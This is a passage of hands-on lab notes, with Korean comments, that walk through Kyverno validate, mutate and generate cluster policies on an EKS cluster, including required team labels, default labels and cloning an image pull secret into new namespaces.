NAME ADMISSION BACKGROUND VALIDATE ACTION READY AGE MESSAGE
require-labels true true Enforce True 12s Ready

# 디플로이먼트 생성 시도
(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# kubectl create deployment nginx --image=nginx
error: failed to create deployment: admission webhook "validate.kyverno.svc-fail" denied the request:

resource Deployment/default/nginx was blocked due to the following policies

require-labels:
autogen-check-team: 'validation error: label ''team'' is required. rule autogen-check-team
failed at path /spec/template/metadata/labels/team/'

# 디플로이먼트 생성 시도
**kubectl run nginx --image nginx --labels team=backend**
kubectl get pod -l team=backend

# 확인
(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# kubectl get policyreport -o wide | grep nginx
3ab33987-2065-4e3a-a8e4-dbd4976554f9 Pod nginx 1 0 0 0 0 2s
(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# kubectl get policyreport 3ab33987-2065-4e3a-a8e4-dbd4976554f9 -o yaml | kubectl neat | yh
apiVersion: wgpolicyk8s.io/v1alpha2
kind: PolicyReport
metadata:
labels:
app.kubernetes.io/managed-by: kyverno
name: 3ab33987-2065-4e3a-a8e4-dbd4976554f9
namespace: default
results:
- message: validation rule 'check-team' passed.
policy: require-labels
result: pass
rule: check-team
scored: true
source: kyverno
timestamp:
nanos: 0
seconds: 1713014288
scope:
apiVersion: v1
kind: Pod
name: nginx
namespace: default
uid: 3ab33987-2065-4e3a-a8e4-dbd4976554f9
summary:
error: 0
fail: 0
pass: 1
skip: 0
warn: 0

# 정책 삭제
**kubectl delete clusterpolicy require-labels**

mutation

  • A Kyverno ClusterPolicy named “add-labels” is created to automatically add a label to pods as default to “bravo” if the “team” label is missing.
kubectl create -f- << EOF
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
name: add-labels
spec:
rules:
- name: add-team
match:
any:
- resources:
kinds:
- Pod
mutate:
patchStrategicMerge:
metadata:
labels:
+(team): bravo
EOF

# 확인
kubectl get mutatingwebhookconfigurations
kubectl get ClusterPolicy
NAME ADMISSION BACKGROUND VALIDATE ACTION READY AGE MESSAGE
add-labels true true Audit True 6m41s Ready

# 파드 생성 후 label 확인
kubectl run redis --image redis
(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# kubectl get pod redis --show-labels
NAME READY STATUS RESTARTS AGE LABELS
redis 0/1 ContainerCreating 0 4s run=redis,team=bravo

# 파드 생성 후 label 확인 : 바로 위와 차이점은?
kubectl run newredis --image redis -l team=alpha
(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# kubectl get pod newredis --show-labels
NAME READY STATUS RESTARTS AGE LABELS
newredis 0/1 ContainerCreating 0 1s team=alpha

# 삭제
kubectl delete clusterpolicy add-labels

generation

  • A Kyverno ClusterPolicy named “sync-secrets” is created to automatically generate an image pull secret in new namespaces based on an existing secret in the “default” namespace.
  • This generation example demonstrates how Kyverno can be used to automatically create resources based on predefined rules and existing resources.
  • In this case, it ensures that every new namespace has an image pull secret available, cloned from a central secret in the “default” namespace.
  1. The generate section of the rule defines the resource to be generated when a new namespace is created.
  2. The apiVersion and kind fields specify that the generated resource will be a Secret.
  3. The name field sets the name of the generated secret to "regcred".
  4. The namespace field uses a variable substitution "{{request.object.metadata.name}}" to dynamically set the namespace of the generated secret to the name of the newly created namespace.
  5. The synchronize field is set to "true", which means that if the source secret ("regcred" in the "default" namespace) is updated, the generated secrets in other namespaces will be automatically synchronized with the updated content.
  6. The clone field specifies the source secret to be cloned. In this case, it refers to the "regcred" secret in the "default" namespace.
  7. When a new namespace is created, Kyverno will automatically generate a Secret named “regcred” in that namespace, cloning the content of the “regcred” secret from the “default” namespace.
  8. You can verify the generation by creating a new namespace using kubectl create ns mytestns and then checking the secrets in that namespace using kubectl -n mytestns get secret. The "regcred" secret should be present in the newly created namespace.
# First, create this Kubernetes Secret in your cluster which will simulate a real image pull secret.
kubectl -n default create secret docker-registry regcred \
--docker-server=myinternalreg.corp.com \
--docker-username=john.doe \
--docker-password=Passw0rd123! \
--docker-email=john.doe@corp.com

#
kubectl get secret regcred
NAME TYPE DATA AGE
regcred kubernetes.io/dockerconfigjson 1 26s

#
kubectl create -f- << EOF
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
name: sync-secrets
spec:
rules:
- name: sync-image-pull-secret
match:
any:
- resources:
kinds:
- Namespace
generate:
apiVersion: v1
kind: Secret
name: regcred
namespace: "{{request.object.metadata.name}}"
synchronize: true
clone:
namespace: default
name: regcred
EOF

#
kubectl get ClusterPolicy
NAME ADMISSION BACKGROUND VALIDATE ACTION READY AGE MESSAGE
sync-secrets true true Audit True 8s Ready

# 신규 네임스페이스 생성 후 확인
kubectl create ns mytestns
kubectl -n mytestns get secret

# 삭제
kubectl delete clusterpolicy sync-secrets

--

--